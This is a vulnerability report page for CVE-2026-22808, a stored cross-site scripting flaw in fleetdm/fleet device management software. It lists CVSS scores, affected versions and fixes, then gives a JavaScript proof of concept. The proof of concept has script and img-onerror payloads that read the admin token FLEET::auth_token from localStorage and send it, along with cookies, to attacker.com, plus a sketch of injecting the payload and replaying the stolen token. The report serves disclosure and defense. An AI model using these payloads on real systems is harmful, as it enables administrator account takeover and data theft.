Security Vulnerability Report
CVE-2026-22808 CVSS 5.4 MEDIUM

CVE-2026-22808

Published: 2026-01-21 22:15:49
Last Modified: 2026-02-18 15:31:04

Description

fleetdm/fleet is open source device management software. Prior to versions 4.78.2, 4.77.1, 4.76.2, 4.75.2, and 4.53.3, if Windows MDM is enabled, an unauthenticated attacker can exploit this XSS vulnerability to steal a Fleet administrator's authentication token (FLEET::auth_token) from localStorage. This could allow unauthorized access to Fleet, including administrative access, visibility into device data, and modification of configuration. Versions 4.78.2, 4.77.1, 4.76.2, 4.75.2, and 4.53.3 fix the issue. If an immediate upgrade is not possible, affected Fleet users should temporarily disable Windows MDM.

CVSS Details

CVSS v3.1 (Primary, NVD)
Score: 5.4
Severity: MEDIUM
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Exploitability subscore: 2.3
Impact subscore: 2.7

CVSS v4.0 (Secondary, GitHub)
Score: 5.5
Severity: MEDIUM
Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H

Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting')

Configurations (Affected Products)

cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:* (versions before 4.53.3) - VULNERABLE
cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:* (4.75.0 up to, excluding, 4.75.2) - VULNERABLE
cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:* (4.76.0 up to, excluding, 4.76.2) - VULNERABLE
cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:* (4.78.0 up to, excluding, 4.78.2) - VULNERABLE
cpe:2.3:a:fleetdm:fleet:4.77.0:*:*:*:*:*:*:* - VULNERABLE

Affected version ranges (fixed version in parentheses):
fleetdm/fleet < 4.53.3 (4.53.3)
fleetdm/fleet >= 4.75.0, < 4.75.2 (4.75.2)
fleetdm/fleet >= 4.76.0, < 4.76.2 (4.76.2)
fleetdm/fleet 4.77.0 (4.77.1)
fleetdm/fleet >= 4.78.0, < 4.78.2 (4.78.2)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// CVE-2026-22808 PoC - XSS to steal FLEET::auth_token from localStorage
// Target: Fleet instances with Windows MDM enabled

// Malicious Payload (inject into vulnerable field)
const xssPayload = `
<script>
  // Steal FLEET::auth_token from localStorage
  const token = localStorage.getItem('FLEET::auth_token');
  if (token) {
    // Send token to attacker-controlled server
    fetch('https://attacker.com/exfil?token=' + encodeURIComponent(token) +
          '&cookie=' + document.cookie, { mode: 'no-cors' });
  }
</script>
`;

// Alternative inline payload
const inlinePayload = `
<img src=x onerror="
  const token = localStorage.getItem('FLEET::auth_token');
  fetch('https://attacker.com/log?data=' + btoa(token));
">
`;

// Step 1: Inject payload via API or UI field
// POST /api/v1/fleet/devices (or similar vulnerable endpoint)
const injectRequest = {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <attacker_token>'
  },
  body: JSON.stringify({
    hostname: '<script>...steal token...</script>',
    platform: 'windows',
    mdminfo: '<img src=x onerror=...>'
  })
};

// Step 2: Wait for admin to visit affected page
// The injected script will execute and exfiltrate the token

// Step 3: Use stolen token for unauthorized access
const hijackRequest = {
  method: 'GET',
  headers: { 'Authorization': 'Bearer <STOLEN_TOKEN>' },
  url: 'https://fleet.example.com/api/v1/fleet/admin/users'
};

console.log('[+] Payload ready for injection');
console.log('[+] Target: Fleet with Windows MDM enabled');
console.log('[+] Objective: Steal FLEET::auth_token from localStorage');
```

References

https://github.com/fleetdm/fleet/security/advisories/GHSA-gfpw-jgvr-cw4j (Vendor Advisory)